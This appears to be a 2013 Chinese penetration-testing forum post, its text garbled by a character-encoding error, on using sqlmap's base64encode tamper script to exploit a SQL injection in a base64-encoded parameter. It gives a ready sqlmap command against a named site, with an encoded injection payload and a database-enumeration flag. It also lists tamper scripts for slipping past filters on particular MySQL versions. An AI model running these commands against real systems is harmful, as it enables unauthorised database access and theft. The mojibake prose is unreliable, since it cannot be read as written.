SQlMap Tamper×¢ÈëBase64±àÂë×¢Èëµã

admin ·¢±íÓÚ 2013-11-23 15:50:45

WVSÉ¨Ä³Õ¾¾Í³öÀ´Ò»¸öSQL Injection£¬²ÎÊý»¹ÊÇbase64±àÂëµÄ£¬ÊÖ¹¤×¢ÈëÂé·³Ò»²½£¬ÓÃsqlmapÔõÃ´×Ô¶¯×¢ÉäÄØ£¿

sqlmapµÄtamperÀïÓÐ¸öbase64encode.py

Ê¹ÓÃÈçÏÂ

sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py ¨Cdbs

sqlmapÓµÓÐºÜ¶à¹¦ÄÜÇ¿Á¦µÄ²å¼þ£¬²å¼þµÄÊ¹ÓÃ·½·¨£º -- tamper ¡°²å¼þÃû³Æ¡±

ÆäÖÐ³£ÓÃµ½µÄbypass½Å±¾ÈÆ¹ýSQLMAPÖ÷ÒªÁ½¸ö½Å±¾£º

space2hash.py £¬¶ÔÓÚMYSQLÊý¾Ý¿â 4.0, 5.0×¢Èë
space2morehash.py £¬¶ÔÓÚMYSQLÊý¾Ý¿â >= 5.1.13 ºÍ MySQL 5.1.41 ×¢Èë
Ê×ÏÈÈ·¶¨Ä¿±êÊý¾Ý¿â°æ±¾£¬È»ºóÑ¡ÔñÏàÓ¦µÄ½Å±¾¡£
-v 3 --batch --tamper "space2hash.py"

»¹ÓÐÆäËûÒ»Ð©²å¼þ£º
encodes±àÂë ¡ª¡ªcharencode.py
base64±àÂë ¡ª¡ª base64encode.py
Ìæ»»¿Õ¸ñºÍ¹Ø¼ü×Ö ¡ª¡ª halfversionedmorekeywords.py

Ò³: [1]

ÖÐ¹úÍøÂçÉøÍ¸²âÊÔÁªÃË's Archiver

SQlMap Tamper×¢ÈëBase64±àÂë×¢Èëµã